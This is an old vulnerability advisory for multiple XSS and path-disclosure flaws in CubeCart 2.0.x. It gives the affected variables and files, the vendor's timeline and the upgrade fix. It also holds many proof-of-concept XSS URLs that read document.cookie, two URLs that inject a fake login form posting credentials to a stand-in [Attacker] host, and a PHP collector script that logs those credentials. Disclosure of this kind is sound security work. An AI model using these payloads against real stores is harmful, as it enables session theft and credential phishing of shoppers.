########################################################
CubeCart 2.0.x multiple variable XSS and path disclosure
vendor: Devellion Limited
vendor url:http://www.cubecart.com
vendorconfirmed :yes exploit avaible: yes
advisore:http://lostmon.blogspot.com/2005/02/
cubecart-20x-multiple-variable-xss.html
vendor solution:http://www.cubecart.com/site/forums/
index.php?showtopic=6032
Related OSVDB iD:
14062 13810 More related
OSVDB Secunia:
SA14416Securitytracker:
1013304#########################################################
CubeCart contains a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate some variables upon submission to some scripts.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server,leading to a loss of integrity.
The 'admin/Settings.inc.php' script is include in all these archives and is this one that fails when validate code was send to the other archives accross of the variables.
##################
variables afected:
##################
cat_id
PHPSESSID
view_doc
product
session
catname
search
page
###########################
posible files XSS afected:
###########################
forgot_pass.php
index.php
login.php
logout.php
new_pass.php
register.php
sale_cat.php
search.php
tellafriend.php
view_doc.php
view_order.php
view_product.php
your_links.php
your_orders.php
##############################
path disclosure Files afected:
##############################
PoC = http://[Target]/path_to_store/cat_navi.php
information.php
language.php
list_docs.php
popular_prod.php
sale.php
subfooter.inc.php
subheader.inc.php
cat_navi.php
###################
versions afected :
###################
2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6 Not affected.
#####################################################
Some proof of comcept ,but have moooore !!!! :/
#####################################################
http://[Target]/path_to_store/?"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/view_order.php?cat_id=1"><script>alert
(document.cookie);</script>
http://[Target]/path_to_store/forgot_pass.php?catname='pruebas1'"><
script>alert(document.cookie);</script>
http://[Target]/path_to_store/index.php?cat_id=5"><body><p>
<h1>CubeCart XSS Pow@ !!!</h1></p>/<body>
http://[Target]/path_to_store/view_order.php?session=1"><script>
alert(document.cookie);</script>
http://[Target]/path_to_store/view_order.php?product=1"><script>alert
(document.cookie);</script>
http://[Target]/path_to_store/your_orders.php?cat_id="><script>
document.write(document.cookie)</script>
http://[Target]/path_to_store/view_product.php?product=1"><script>
alert(document.cookie);</script>
http://[Target]/path_to_store/tellafriend.php?product=1&session="><
script>alert(document.cookie)</script>
http://[Target]/path_to_store/tellafriend.php?product=1"><script>
document.write(document.cookie)</script>
http://[Target]/path_to_store/login.php?session="><script>alert
(document.cookie);</script>
http://[Target]/path_to_store/search.php?search=%22%3E%3Cform%
20action=http://[Attacker]/savedb.php%20method=post%3EUsername:
%3Cinput%20name=username%20type=text%20maxlength=30%3EPassword:
%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cinput%
20name=Login%20type=submit%20value=Login%3E%3C/form>
http://[Target]/path_to_store/tellafriend.php?product=1%22%3E%
3Cform%20action=http://[Attacker]/savedb.php%20method=post%3E
Username:%3Cinput%20name=username%20type=text%20maxlength=30%3
EPassword:%3Cinput%20name=password%20type=text%20maxlength=30%3
E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form%3E
###########################
foof of concept savedb.php
###########################
<?
$lala = fopen("tostada.txt","a+");
fwrite($lala,"username:".$username."|"."Password:".$password."|");
fclose($lala);
header("Location:http://[target]/path_to_store/login.php");
exit();
?>
#############################
Change the variable for other vulnerable or for other file & variable
so many are vulnerables :P
solution :
1- upgrade to version 2.0.6
1.1- for fixing path disclusure issue ,the Vendor release a fix at
2005-02-21.Cubecart 2.0.6 is not afected ,upgrade your store or aply the fix.
1.2- For fixing most XSS flaws You need to update your store to 2.0.6 and wait for all changes or manual aply the fix.
#################
release time :
#################
discovered : 2005-02-15
vendor notify: 2005-02-15
vendor respose: 2005-02-15
path disclose.fix: 2005-02-21
XSS fix: 2005-02-25
disclosure date: 2005-02-25
atentamente
Lostmon (lostmon@gmail.com)
Thnx to estrella to be my ligth
Thnx to www.hispanew.com for support
Thnx to cubecart Team ,Good Respose & Good work !!
Thnx To
http://www.osvdb.org blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente...